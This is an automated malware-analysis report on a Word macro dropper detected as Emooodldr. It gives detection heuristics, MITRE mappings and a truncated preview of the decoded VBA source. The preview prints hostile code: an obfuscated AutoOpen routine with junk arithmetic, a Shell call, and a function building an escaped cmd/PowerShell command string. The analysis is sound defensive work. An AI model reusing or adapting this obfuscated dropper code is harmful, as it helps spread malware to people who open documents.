MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as a malicious dropper by ClamAV, and heuristics indicate the presence of a legacy WordBasic AutoOpen macro. This macro is likely designed to download and execute a secondary payload, a common behavior for the Emooodldr family. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.
Heuristics 5
-
ClamAV: Doc.Dropper.Emooodldr-6683857-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emooodldr-6683857-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8407 bytes |
SHA-256: a3bb893e2084c2d1ca8ec552679a32c2af9cb9cdd07b6ac03f975bc45489ae79 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MSjtzMBKNuno"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim vGFXYV()
ReDim vGFXYV(5)
vGFXYV(0) = (31530 * DJKwzu / 64043 / akzqjp / tdYdCX * aATYnk)
vGFXYV(1) = 66667 * FZPwi / (44621 * MtasMs)
vGFXYV(2) = QkCFJ * tArOG / jJdbH / rafXbk / ZPRiC * 18828 / wJkjV * aXGFiA
vGFXYV(3) = (85439 * nUjRT) * VRltIS / kvcVpE
vGFXYV(4) = (OZZuGZ * UUZpa / (tlviNi * pjYra))
Dim UzZKcs()
ReDim UzZKcs(2)
UzZKcs(0) = rIBba * TPXPwS * zDwwA * QGzwS * nKpUsn * 27229 / 72813 * qKcYN * 96940 * sWLXd / (mRzbJK * OtKirn)
UzZKcs(1) = (45292 * vfciho * 17518 * VZmTBO)
Dim EBXhz()
ReDim EBXhz(4)
EBXhz(0) = 43111 / MLrwa / vsBVvm * 25734 * (jEwYfV * waupOP * 53849 / JFqKU)
EBXhz(1) = (36216 / jjZQKU) * (75763 * 46761 / TMTYwY / UBlOl)
EBXhz(2) = GMfTir / 31367 * 9861 / sRkXPw / 29585 * KKBCW * wDRkw / JjEKj * NkqqvI * rTCnYJ
EBXhz(3) = EqaEj / kJjPMG * iSJMa / 78725 / liTUOt / 30081
Dim bdjtww()
ReDim bdjtww(4)
bdjtww(0) = NvoKt * AwLDia * 3646 / AuIGqG / 64110 / hUDnf
bdjtww(1) = rqvdvp * ztCpn / jMnsck / bibnGq * 42269 / NUGFu / FVIEi * bABFQ / Rzoub * DoRIOI / FTLmZ / jtjirf
bdjtww(2) = zYPahW / DYYXS / (85676 * CGqzHz / 62184 * sPObJ) * (64930 * lTzPn / 56966 / YrarmU)
bdjtww(3) = voTjQj / phkfHY * 62092 * 832 / (22332 * NounF)
Dim tQtblR()
ReDim tQtblR(5)
tQtblR(0) = IAans / Bbipn * 7199 * KpMjW * ZXGpp / 61384 * 11288 * 51236 * 79300 * 98462
tQtblR(1) = (ijRzA / ABuhd * (qZGLEY * DJFLr * CKkHmd / cLKEm))
tQtblR(2) = JcMics / iQPjUB * 3313 * 70995 / (91731 / ZXZEw * 3611 / tHERP / (59798 / BZiPb * 82762 / cTvQlv * 1029 * lbbjBk))
tQtblR(3) = MVLawo * nfOlz * uWmJEj / DinMGP / (Wdpjd / TMIEAu * 73200 / jPBAv)
tQtblR(4) = tPpRb / 34759 * 76009 / iiwUji * KpfHVO / NhIKzo * 46004 * lLKzN * oXHLr * iaFjND * 19265 / ZWtaD
Shell@ knLAEj + JRUwFTwm + UqWRXvdXDmcc, Format(0)
Dim UkpbU()
ReDim UkpbU(2)
UkpbU(0) = (97921 * XRVmZF / 32793 / AQWkz / (DUDar / ZSChU))
UkpbU(1) = jGDhl / cSlhEd / 89203 * uvOJm / (30488 * 33980 / 7495 * QmBdl)
Dim iCoPSk()
ReDim iCoPSk(5)
iCoPSk(0) = CFhOpq * lKdSWi * TzIwzw * HPfjVb / 38120 * ihUZp * 36063 * pDiElm * (JJGSKL / jQUnO / (89214 * BhUPYh / 62270 / wwoQhK))
iCoPSk(1) = 8696 * sLsPG / (aDRIB / RzmaYv / 75209 / NpMEM)
iCoPSk(2) = (25890 / Jduir / (54509 * bcVfjf / RzQji / 57889 / (98203 * NrlXi * DznDs * QZXdJ)))
iCoPSk(3) = RXKFt * HPwrv / djLzP / 4672 * 87053 / 38062 / 88095 * YchbrU / ranXNM * AIwZQT
iCoPSk(4) = (11580 * DPZJz)
End Sub
Attribute VB_Name = "PnRAYKE"
Function knLAEj()
On _
Error _
Resume _
Next
Dim MARXnd()
ReDim MARXnd(3)
MARXnd(0) = lKSBv * ZzYwOX * 20981 * WwdoLw / 90013 / cEjrP / JbjJwo * 67282 / (KKRzs / 18106 * iWbnEp * oicfb * (hNVDYo / wPFaVE))
MARXnd(1) = 20101 * SXNFlJ / 95915 * 65564 / 9939 / LvEnA * 62952 * NDizo / 26254 / EUzPR * 814 / zfTVK
MARXnd(2) = (29473 / pWkfQ * NtjJPY / 17221 / 15814 / fodKo)
LIGVHvNtcl = Format(Chr(11 + 13 + 4 + 15 + 56)) + "md /V^:^O/" + Format(Chr(8 + 9 + 3 + 10 + 37)) + Format(Chr(3 + 4 + 1 + 5 + 21)) + "s^e^t ^m^5J= " + "^ ^ ^ ^" + " ^ ^ ^" + " ^ ^ ^ ^ " + "}^}{^h" + Format(Chr(11 + 13 + 4 + 15 + 56)) + "t^a" + Format(Chr(11 + 13 + 4 + 15 + 56)) + "};^ka^erb^;^jw" + "^m$ me^" + "tI^-e^kovnI;)j^w^m^$^ " + "^,zM^s$(el"
Dim iQEmL()
ReDim iQEmL(2)
iQEmL(0) = lRpRs * huSYO / KkqAs * JzzirA / XZLBOL / BdwrZ
iQEmL(1) = 14228 / kUlVF * 92136 / qfThYN / OQGaoq / wVsDN / 1906 * hmzak * 51993 * dNImE / jtsTpw / nMrRkR
Dim GjjGZ()
ReDim GjjGZ(5)
GjjGZ(0) = qNciEs * LOrwdI / (68274 * 49846 * LWcuPz / ZIbnz)
GjjGZ(1) = 28343 / wcFsFj / (FCOas / 10635)
GjjGZ(2) = ZfpNs / VMifi / (sCVdEj / jsVYPi)
GjjGZ(3) = WFUNUW / DAdmaE / 86727 * mwaJM / MjZJqv / ZEHZj * 97854 / PsRKLB * 78644 * sriiD
GjjGZ(4) = 38565 * WwFSF * 19829 * uDibS / wWMqFt * uhPwKz / 19756 * ifLrFT
Dim zsSsuS()
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.